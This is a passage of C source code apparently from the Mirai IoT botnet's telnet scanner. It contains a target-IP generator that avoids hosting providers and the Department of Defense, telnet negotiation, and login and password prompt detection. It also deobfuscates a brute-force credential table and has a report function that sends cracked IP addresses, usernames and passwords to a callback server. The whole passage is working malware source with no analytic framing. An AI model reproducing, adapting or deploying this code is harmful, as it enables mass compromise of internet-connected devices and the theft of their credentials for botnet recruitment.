          (o1 == 178 && o2 == 62) ||                           //Digital Ocean

781
          (o1 == 104 && o2 == 131) ||                          //Digital Ocean

782
          (o1 == 104 && o2 == 236) ||                          //Digital Ocean

783
          (o1 == 107 && o2 == 170) ||                          //Digital Ocean

784
          (o1 == 138 && o2 == 197) ||                          //Digital Ocean

785
          (o1 == 138 && o2 == 68) ||                           //Digital Ocean

786
          (o1 == 139 && o2 == 59) ||                           //Digital Ocean

787
          (o1 == 146 && o2 == 185 && o3 >= 128 && o3 < 191) || //Digital Ocean

788
          (o1 == 163 && o2 == 47 && o3 >= 10 && o3 < 11) ||    //Digital Ocean

789
          (o1 == 174 && o2 == 138 && o3 >= 1 && o3 < 127) ||   //Digital Ocean

790
          (o1 == 192 && o2 == 241 && o3 >= 128 && o3 < 255) || //Digital Ocean

791
          (o1 == 198 && o2 == 199 && o3 >= 64 && o3 < 127) ||  //Digital Ocean

792
          (o1 == 198 && o2 == 211 && o3 >= 96 && o3 < 127) ||  //Digital Ocean

793
          (o1 == 207 && o2 == 154 && o3 >= 192 && o3 < 255) || //Digital Ocean

794
          (o1 == 37 && o2 == 139 && o3 >= 1 && o3 < 31) ||     //Digital Ocean

795
          (o1 == 67 && o2 == 207 && o3 >= 64 && o3 < 95) ||    //Digital Ocean

796
          (o1 == 67 && o2 == 205 && o3 >= 128 && o3 < 191) ||  //Digital Ocean

797
          (o1 == 80 && o2 == 240 && o3 >= 128 && o3 < 143) ||  //Digital Ocean

798
          (o1 == 82 && o2 == 196 && o3 >= 1 && o3 < 15) ||     //Digital Ocean

799
          (o1 == 95 && o2 == 85 && o3 >= 8 && o3 < 63) ||      //Digital Ocean

800
          (o1 == 64 && o2 == 237 && o3 >= 32 && o3 < 43) ||    //Choopa & Vultr

801
          (o1 == 185 && o2 == 92 && o3 >= 220 && o3 < 223) ||  //Choopa & Vultr

802
          (o1 == 104 && o2 == 238 && o3 >= 128 && o3 < 191) || //Choopa & Vultr

803
          (o1 == 209 && o2 == 222 && o3 >= 1 && o3 < 31) ||    //Choopa & Vultr

804
          (o1 == 208 && o2 == 167 && o3 >= 232 && o3 < 252) || //Choopa & Vultr

805
          (o1 == 66 && o2 == 55 && o3 >= 128 && o3 < 159) ||   //Choopa & Vultr

806
          (o1 == 45 && o2 == 63 && o3 >= 1 && o3 < 127) ||     //Choopa & Vultr

807
          (o1 == 216 && o2 == 237 && o3 >= 128 && o3 < 159) || //Choopa & Vultr

808
          (o1 == 108 && o2 == 61) ||                           //Choopa & Vultr

809
          (o1 == 45 && o2 == 76) ||                            //Choopa & Vultr

810
          (o1 == 185 && o2 == 11 && o3 >= 144 && o3 < 148) ||  //Blazingfast & Nforce

811
          (o1 == 185 && o2 == 56 && o3 >= 21 && o3 < 23) ||    //Blazingfast & Nforce

812
          (o1 == 185 && o2 == 61 && o3 >= 136 && o3 < 139) ||  //Blazingfast & Nforce

813
          (o1 == 185 && o2 == 62 && o3 >= 187 && o3 < 191) ||  //Blazingfast & Nforce

814
          (o1 == 66 && o2 == 150 && o3 >= 120 && o3 < 215) ||  //Blazingfast & Nforce

815
          (o1 == 66 && o2 == 151 && o3 >= 137 && o3 < 139) ||  //Blazingfast & Nforce

816
          (o1 == 64 && o2 == 94 && o3 >= 237 && o3 < 255) ||   //Blazingfast & Nforce

817
          (o1 == 63 && o2 == 251 && o3 >= 19 && o3 < 21) ||    //Blazingfast & Nforce

818
          (o1 == 70 && o2 == 42 && o3 >= 73 && o3 < 75) ||     //Blazingfast & Nforce

819
          (o1 == 74 && o2 == 91 && o3 >= 113 && o3 < 115) ||   //Blazingfast & Nforce

820
          (o1 == 74 && o2 == 201 && o3 >= 56 && o3 < 58) ||    //Blazingfast & Nforce

821
          (o1 == 188 && o2 == 209 && o3 >= 48 && o3 < 53) ||   //Blazingfast & Nforce

822
          (o1 == 188 && o2 == 165) ||                          //OVH

823
          (o1 == 149 && o2 == 202) ||                          //OVH

824
          (o1 == 151 && o2 == 80) ||                           //OVH

825
          (o1 == 164 && o2 == 132) ||                          //OVH

826
          (o1 == 176 && o2 == 31) ||                           //OVH

827
          (o1 == 167 && o2 == 114) ||                          //OVH

828
          (o1 == 178 && o2 == 32) ||                           //OVH

829
          (o1 == 178 && o2 == 33) ||                           //OVH

830
          (o1 == 37 && o2 == 59) ||                            //OVH

831
          (o1 == 37 && o2 == 187) ||                           //OVH

832
          (o1 == 46 && o2 == 105) ||                           //OVH

833
          (o1 == 51 && o2 == 254) ||                           //OVH

834
          (o1 == 51 && o2 == 255) ||                           //OVH

835
          (o1 == 5 && o2 == 135) ||                            //OVH

836
          (o1 == 5 && o2 == 196) ||                            //OVH

837
          (o1 == 5 && o2 == 39) ||                             //OVH

838
          (o1 == 91 && o2 == 134) ||                           //OVH

839
          (o1 == 104 && o2 == 200 && o3 >= 128 && o3 < 159) || //Total Server Solutions

840
          (o1 == 107 && o2 == 152 && o3 >= 96 && o3 < 111) ||  //Total Server Solutions

841
          (o1 == 107 && o2 == 181 && o3 >= 160 && o3 < 189) || //Total Server Solutions

842
          (o1 == 172 && o2 == 98 && o3 >= 64 && o3 < 95) ||    //Total Server Solutions

843
          (o1 == 184 && o2 == 170 && o3 >= 240 && o3 < 255) || //Total Server Solutions

844
          (o1 == 192 && o2 == 111 && o3 >= 128 && o3 < 143) || //Total Server Solutions

845
          (o1 == 192 && o2 == 252 && o3 >= 208 && o3 < 223) || //Total Server Solutions

846
          (o1 == 192 && o2 == 40 && o3 >= 56 && o3 < 59) ||    //Total Server Solutions

847
          (o1 == 198 && o2 == 8 && o3 >= 81 && o3 < 95) ||     //Total Server Solutions

848
          (o1 == 199 && o2 == 116 && o3 >= 112 && o3 < 119) || //Total Server Solutions

849
          (o1 == 199 && o2 == 229 && o3 >= 248 && o3 < 255) || //Total Server Solutions

850
          (o1 == 199 && o2 == 36 && o3 >= 220 && o3 < 223) ||  //Total Server Solutions

851
          (o1 == 199 && o2 == 58 && o3 >= 184 && o3 < 187) ||  //Total Server Solutions

852
          (o1 == 206 && o2 == 220 && o3 >= 172 && o3 < 175) || //Total Server Solutions

853
          (o1 == 208 && o2 == 78 && o3 >= 40 && o3 < 43) ||    //Total Server Solutions

854
          (o1 == 208 && o2 == 93 && o3 >= 192 && o3 < 193) ||  //Total Server Solutions

855
          (o1 == 66 && o2 == 71 && o3 >= 240 && o3 < 255) ||   //Total Server Solutions

856
          (o1 == 98 && o2 == 142 && o3 >= 208 && o3 < 223) ||  //Total Server Solutions

857
          (o1 == 107 && o2 >= 20 && o2 < 24) ||                //Amazon

858
          (o1 == 35 && o2 >= 159 && o2 < 183) ||               //Amazon

859
          (o1 == 52 && o2 >= 1 && o2 < 95) ||                  //Amazon

860
          (o1 == 52 && o2 >= 95 && o2 < 255) ||                //Amazon + Microsoft

861
          (o1 == 54 && o2 >= 64 && o2 < 95) ||                 //Amazon + Microsoft

862
          (o1 == 54 && o2 >= 144 && o2 < 255) ||               //Amazon + Microsoft

863
          (o1 == 13 && o2 >= 52 && o2 < 60) ||                 //Amazon + Microsoft

864
          (o1 == 13 && o2 >= 112 && o2 < 115) ||               //Amazon + Microsoft

865
          (o1 == 163 && o2 == 172) ||                          //ONLINE SAS

866
          (o1 == 51 && o2 >= 15 && o2 < 255) ||                //ONLINE SAS

867
          (o1 == 79 && o2 == 121 && o3 >= 128 && o3 < 255) ||  //Some more

868
          (o1 == 212 && o2 == 47 && o3 >= 224 && o3 < 255) ||  //Some more

869
          (o1 == 89 && o2 == 34 && o3 >= 96 && o3 < 97) ||     //Some more

870
          (o1 == 219 && o2 >= 216 && o2 < 231) ||              //Some more

871
          (o1 == 23 && o2 >= 94 && o2 < 109) ||                //Some more

872
          (o1 == 178 && o2 >= 62 && o2 < 63) ||                //Some more

873
          (o1 == 106 && o2 >= 182 && o2 < 189) ||              //Some more

874
          (o1 == 106 && o2 >= 184) ||                          //Some more

875
          (o1 == 34 && o2 >= 245 && o2 < 255) ||               //Some more

876
          (o1 == 87 && o2 >= 97 && o2 < 99) ||                 //Some more

877
          (o1 == 86 && o2 == 208) ||                           //Some more

878
          (o1 == 86 && o2 == 209) ||                           //Some more

879
          (o1 == 193 && o2 == 164) ||                          //Some more

880
          (o1 == 120 && o2 >= 103 && o2 < 108) ||              //Ministry of Education Computer Science

881
          (o1 == 188 && o2 == 68) ||                           //Ministry of Education Computer Science

882
          (o1 == 78 && o2 == 46) ||                            //Ministry of Education Computer Science

883
          (o1 >= 224) ||                                       //Multicast

884
          (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense

885
    );

886


887
    return INET_ADDR(o1,o2,o3,o4);

888
}

889
static int consume_iacs(struct scanner_connection *conn)

890
{

891
    int consumed = 0;

892
    uint8_t *ptr = conn->rdbuf;

893


894
    while (consumed < conn->rdbuf_pos)

895
    {

896
        int i;

897


898
        if (*ptr != 0xff)

899
            break;

900
        else if (*ptr == 0xff)

901
        {

902
            if (!can_consume(conn, ptr, 1))

903
                break;

904
            if (ptr[1] == 0xff)

905
            {

906
                ptr += 2;

907
                consumed += 2;

908
                continue;

909
            }

910
            else if (ptr[1] == 0xfd)

911
            {

912
                uint8_t tmp1[3] = {255, 251, 31};

913
                uint8_t tmp2[9] = {255, 250, 31, 0, 80, 0, 24, 255, 240};

914


915
                if (!can_consume(conn, ptr, 2))

916
                    break;

917
                if (ptr[2] != 31)

918
                    goto iac_wont;

919


920
                ptr += 3;

921
                consumed += 3;

922


923
                send(conn->fd, tmp1, 3, MSG_NOSIGNAL);

924
                send(conn->fd, tmp2, 9, MSG_NOSIGNAL);

925
            }

926
            else

927
            {

928
                iac_wont:

929


930
                if (!can_consume(conn, ptr, 2))

931
                    break;

932


933
                for (i = 0; i < 3; i++)

934
                {

935
                    if (ptr[i] == 0xfd)

936
                        ptr[i] = 0xfc;

937
                    else if (ptr[i] == 0xfb)

938
                        ptr[i] = 0xfd;

939
                }

940


941
                send(conn->fd, ptr, 3, MSG_NOSIGNAL);

942
                ptr += 3;

943
                consumed += 3;

944
            }

945
        }

946
    }

947


948
    return consumed;

949
}

950


951
static int consume_any_prompt(struct scanner_connection *conn)

952
{

953
    char *pch;

954
    int i, prompt_ending = -1;

955


956
    for (i = conn->rdbuf_pos - 1; i > 0; i--)

957
    {

958
        if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#' || conn->rdbuf[i] == '%')

959
        {

960
            prompt_ending = i + 1;

961
            break;

962
        }

963
    }

964


965
    if (prompt_ending == -1)

966
        return 0;

967
    else

968
        return prompt_ending;

969
}

970


971
static int consume_user_prompt(struct scanner_connection *conn)

972
{

973
    char *pch;

974
    int i, prompt_ending = -1;

975


976
    for (i = conn->rdbuf_pos - 1; i > 0; i--)

977
    {

978
        if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#' || conn->rdbuf[i] == '%')

979
        {

980
            prompt_ending = i + 1;

981
            break;

982
        }

983
    }

984


985
    if (prompt_ending == -1)

986
    {

987
        int tmp;

988


989
        if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "ogin", 4)) != -1)

990
            prompt_ending = tmp;

991
        else if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "enter", 5)) != -1)

992
            prompt_ending = tmp;

993
    }

994


995
    if (prompt_ending == -1)

996
        return 0;

997
    else

998
        return prompt_ending;

999
}

1000


1001
static int consume_pass_prompt(struct scanner_connection *conn)

1002
{

1003
    char *pch;

1004
    int i, prompt_ending = -1;

1005


1006
    for (i = conn->rdbuf_pos - 1; i > 0; i--)

1007
    {

1008
        if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#')

1009
        {

1010
            prompt_ending = i + 1;

1011
            break;

1012
        }

1013
    }

1014


1015
    if (prompt_ending == -1)

1016
    {

1017
        int tmp;

1018


1019
        if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "assword", 7)) != -1)

1020
            prompt_ending = tmp;

1021
    }

1022


1023
    if (prompt_ending == -1)

1024
        return 0;

1025
    else

1026
        return prompt_ending;

1027
}

1028


1029
static int consume_resp_prompt(struct scanner_connection *conn)

1030
{

1031
    char *tkn_resp;

1032
    int prompt_ending, len;

1033


1034
    table_unlock_val(TABLE_SCAN_NCORRECT);

1035
    tkn_resp = table_retrieve_val(TABLE_SCAN_NCORRECT, &len);

1036
    if (util_memsearch(conn->rdbuf, conn->rdbuf_pos, tkn_resp, len - 1) != -1)

1037
    {

1038
        table_lock_val(TABLE_SCAN_NCORRECT);

1039
        return -1;

1040
    }

1041
    table_lock_val(TABLE_SCAN_NCORRECT);

1042


1043
    table_unlock_val(TABLE_SCAN_RESP);

1044
    tkn_resp = table_retrieve_val(TABLE_SCAN_RESP, &len);

1045
    prompt_ending = util_memsearch(conn->rdbuf, conn->rdbuf_pos, tkn_resp, len - 1);

1046
    table_lock_val(TABLE_SCAN_RESP);

1047


1048
    if (prompt_ending == -1)

1049
        return 0;

1050
    else

1051
        return prompt_ending;

1052
}

1053


1054
static void add_auth_entry(char *enc_user, char *enc_pass, uint16_t weight)

1055
{

1056
    int tmp;

1057


1058
    auth_table = realloc(auth_table, (auth_table_len + 1) * sizeof (struct scanner_auth));

1059
    auth_table[auth_table_len].username = deobf(enc_user, &tmp);

1060
    auth_table[auth_table_len].username_len = (uint8_t)tmp;

1061
    auth_table[auth_table_len].password = deobf(enc_pass, &tmp);

1062
    auth_table[auth_table_len].password_len = (uint8_t)tmp;

1063
    auth_table[auth_table_len].weight_min = auth_table_max_weight;

1064
    auth_table[auth_table_len++].weight_max = auth_table_max_weight + weight;

1065
    auth_table_max_weight += weight;

1066
}

1067


1068
static struct scanner_auth *random_auth_entry(void)

1069
{

1070
    int i;

1071
    uint16_t r = (uint16_t)(rand_next() % auth_table_max_weight);

1072


1073
    for (i = 0; i < auth_table_len; i++)

1074
    {

1075
        if (r < auth_table[i].weight_min)

1076
            continue;

1077
        else if (r < auth_table[i].weight_max)

1078
            return &auth_table[i];

1079
    }

1080


1081
    return NULL;

1082
}

1083


1084
static void report_working(ipv4_t daddr, uint16_t dport, struct scanner_auth *auth)

1085
{

1086
    struct sockaddr_in addr;

1087
    int pid = fork(), fd;

1088
    struct resolv_entries *entries = NULL;

1089


1090
    if (pid > 0 || pid == -1)

1091
        return;

1092


1093
    if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)

1094
    {

1095
#ifdef DEBUG

1096
        printf("[report] Failed to call socket()\n");

1097
#endif

1098
        exit(0);

1099
    }

1100


1101
    table_unlock_val(TABLE_SCAN_CB_PORT);

1102
    addr.sin_family = AF_INET;

1103
    addr.sin_addr.s_addr = SCANIP;

1104
    addr.sin_port = *((port_t *)table_retrieve_val(TABLE_SCAN_CB_PORT, NULL));

1105
    table_lock_val(TABLE_SCAN_CB_PORT);

1106


1107
    if (connect(fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in)) == -1)

1108
    {

1109
#ifdef DEBUG

1110
        printf("[report] Failed to connect to scanner callback!\n");

1111
#endif

1112
        close(fd);

1113
        exit(0);

1114
    }

1115


1116
    uint8_t zero = 0;

1117
    send(fd, &zero, sizeof (uint8_t), MSG_NOSIGNAL);

1118
    send(fd, &daddr, sizeof (ipv4_t), MSG_NOSIGNAL);

1119
    send(fd, &dport, sizeof (uint16_t), MSG_NOSIGNAL);

1120
    send(fd, &(auth->username_len), sizeof (uint8_t), MSG_NOSIGNAL);

1121
    send(fd, auth->username, auth->username_len, MSG_NOSIGNAL);

1122
    send(fd, &(auth->password_len), sizeof (uint8_t), MSG_NOSIGNAL);

1123
    send(fd, auth->password, auth->password_len, MSG_NOSIGNAL);

1124


1125
#ifdef DEBUG

1126
    printf("[report] Send scan result to loader\n");

1127
#endif

1128


1129
    close(fd);

1130
    exit(0);

1131
}

1132


1133
static char *deobf(char *str, int *len)

1134
{

1135
    int i;

1136
    char *cpy;

1137


1138
    *len = util_strlen(str);

1139
    cpy = malloc(*len + 1);

1140


1141
    util_memcpy(cpy, str, *len + 1);

1142


1143
    for (i = 0; i < *len; i++)

1144
    {

1145
        cpy[i] ^= 0xDE;

1146
        cpy[i] ^= 0xDE;

1147
        cpy[i] ^= 0xFF;

1148
        cpy[i] ^= 0xBA;

1149
    }

1150


1151
    return cpy;

1152
}

1153


1154
static BOOL can_consume(struct scanner_connection *conn, uint8_t *ptr, int amount)

1155
{

1156
    uint8_t *end = conn->rdbuf + conn->rdbuf_pos;

1157


1158
    return ptr + amount < end;

1159
}

1160


1161
#endif

1162


1163